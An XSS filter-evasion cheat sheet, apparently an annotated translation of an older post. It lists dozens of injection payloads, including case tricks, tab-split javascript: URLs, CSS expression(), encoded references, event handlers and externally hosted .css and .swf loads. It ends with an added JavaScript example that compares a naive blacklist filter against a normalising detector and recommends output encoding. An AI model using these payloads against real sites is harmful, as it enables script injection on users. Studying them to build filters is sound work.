1. Vary the case of characters

HTML tag names are case-insensitive, so a filter that matches the literal string <script> misses a mixed-case tag:

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

A doubled "<", or a ">" inside a quoted attribute value, breaks regexes that assume the tag ends at the first ">":

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another extension in place of .js

The browser executes whatever a script src returns regardless of the file extension, so a filter keyed on ".js" is useless:

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

The injected page only references a stylesheet; the javascript: URL lives inside it (only old Internet Explorer ever executed javascript: URLs from CSS):

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

The HTML parser accepts "/" (or any junk token) between the tag name and its attributes, so "<script " is not the only way a script tag can start:

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tabs or newlines to evade

The gaps inside "javascript" below are tab or newline characters; the browser discards them before it parses the URL, so the scheme is still javascript: even though the literal string never appears:

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> newline
7. Use "\" to evade

CSS treats a backslash as an escape character and strips /* */ comments, so expre\ssi\on and expr/*x*/ession are both read as expression (IE's expression() and javascript: in @import only ever worked in old Internet Explorer):

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

Writing the payload as hexadecimal character references (&#xHH, with or without the terminating ";") hides the keywords from a literal match; the browser decodes the references back to the source below before parsing it:

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in HTML tag attributes (event handlers)

No <script> tag is needed at all: any intrinsic event handler attribute runs script.

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload.
10. XSS code inside an .swf

A Flash movie embedded with AllowScriptAccess="always" may call JavaScript in the embedding page:

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it

The string "javascript:" never appears whole in the input; an Internet Explorer XML data island (DATASRC/DATAFLD) joins the pieces when it renders the field as HTML:

<XML ID=I><X><C>

<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X>

</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

The Internet Explorer HTML+TIME behavior sets innerHTML for you, so the script tag arrives inside an attribute value rather than as markup:

<HTML><BODY>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

</BODY></HTML>
13. Write a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

Any attribute that takes a URL may carry a javascript: scheme. Modern browsers no longer run javascript: from an IMG SRC or from CSS url(), but IFRAME SRC, FRAME SRC and LINK HREF still do:

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
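The evasions in sections 1 through 14 all target the same weakness: a filter that looks for literal substrings in the raw input instead of normalising the input the way the browser will. The following is an added example, not code from the original post: a naive blacklist filter of that kind next to a check that first undoes case, tab/newline stripping, numeric character references, CSS escapes and comments, and then looks at the result. The payload strings are constructed from the page's own examples; the hex-encoded META refresh line is a reconstruction matching the description in section 8, since the encoded form itself is not on the page. The function and constant names are my own.

```javascript
// Added example, not from the original post: a naive blacklist filter of the
// kind these payloads bypass, beside a normalising check that catches them.
// Illustrative only; the payload list is constructed from the page's examples.

// Map a code point to a string, tolerating out-of-range values from junk input.
const fromCp = (n) => (n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n));

// The naive filter: literal, case-sensitive substring checks.
function naiveFilter(html) {
  return /<script>/.test(html) || /javascript:/.test(html);
}

// Decode numeric character references, with or without the trailing ';',
// as the browser does inside attribute values (section 8).
function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCp(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => fromCp(parseInt(d, 10)));
}

// Strip CSS comments and undo backslash escapes (section 7): "expre\ssi\on"
// and "expr/*x*/ession" both come back as "expression".
function normalizeCss(s) {
  return s
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\([0-9a-f]{1,6})[ \t\n]?|\\([\s\S])/gi,
      (_, hex, ch) => (hex ? fromCp(parseInt(hex, 16)) : ch));
}

// Scheme of a URL-valued attribute after browser-style normalisation: decode
// references, drop embedded tab/LF/CR (section 6), trim leading/trailing
// control characters, fold case.
function urlScheme(value) {
  const v = decodeCharRefs(value)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  return m ? m[1].toLowerCase() : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);
// Attributes whose value is a URL, plus META CONTENT for refresh (section 14).
const URL_ATTRS =
  /\b(src|href|dynsrc|lowsrc|background|action|content)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Returns a short reason when the fragment is rejected, or null when it passes.
// Deliberately conservative: it normalises the whole fragment, so it may reject
// harmless text that merely looks like CSS or a character reference.
function hardenedFilter(html) {
  // Tag name match tolerant of case and of '/' or whitespace after it (sections 1, 5).
  if (/<\s*script(?=[\s\/>])/i.test(html)) return 'script tag';
  // Any intrinsic event handler attribute (section 9).
  if (/[\s"'\/]on[a-z]+\s*=/i.test(html)) return 'event handler';
  for (const m of html.matchAll(URL_ATTRS)) {
    let v = m[2] ?? m[3] ?? m[4];
    const refresh = /^\s*\d+\s*;\s*url\s*=\s*(.*)$/i.exec(decodeCharRefs(v));
    if (refresh) v = refresh[1];
    if (SCRIPT_SCHEMES.has(urlScheme(v))) return `script scheme in ${m[1].toLowerCase()}`;
  }
  // CSS in style attributes or <style>: expression() and url()/@import with a
  // script scheme (sections 4, 7, 14).
  const css = normalizeCss(decodeCharRefs(html));
  if (/expression\s*\(/i.test(css)) return 'css expression()';
  for (const m of css.matchAll(/(?:url\s*\(|@import)\s*['"]?\s*([^'")\s;]*)/gi)) {
    if (SCRIPT_SCHEMES.has(urlScheme(m[1]))) return 'script scheme in stylesheet';
  }
  return null;
}

// Constructed test payloads, taken from the sections above (backslashes kept
// verbatim with String.raw; \t is a real tab character).
const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",
  '<SCRIPT/SRC="t.js"></SCRIPT>',
  "<img src=\"jav\tascr\tipt:alert('XSS3')\">",
  "<body onload=\"alert('onload')\">",
  String.raw`<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">`,
  String.raw`<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">`,
  String.raw`<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>`,
  '<META HTTP-EQUIV="refresh" CONTENT="0;url=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(\'abc\');">',
];

// Section 11's IE-only data island: neither filter sees a scheme here. That is
// the general lesson: a blacklist is never complete, so encode output and
// whitelist markup instead of hunting for bad strings.
const IE_DATA_ISLAND =
  '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]></C></X></xml>' +
  '<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>';

// Run both filters over every payload and report what each one decided.
function evaluate(payloads = PAYLOADS) {
  return payloads.map((p) => ({ payload: p, naive: naiveFilter(p), hardened: hardenedFilter(p) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of evaluate()) console.log(`naive=${r.naive}\thardened=${r.hardened}\t${r.payload}`);
  console.log(`data island: hardened=${hardenedFilter(IE_DATA_ISLAND)}`);
}
```

Every payload in the list slips past naiveFilter and is rejected by hardenedFilter, while the data island passes both, which is the point: normalising before matching closes the evasions on this page, but it is still a blacklist. The durable fix is contextual output encoding plus a whitelist sanitizer, with the checks above useful only as a detection signal.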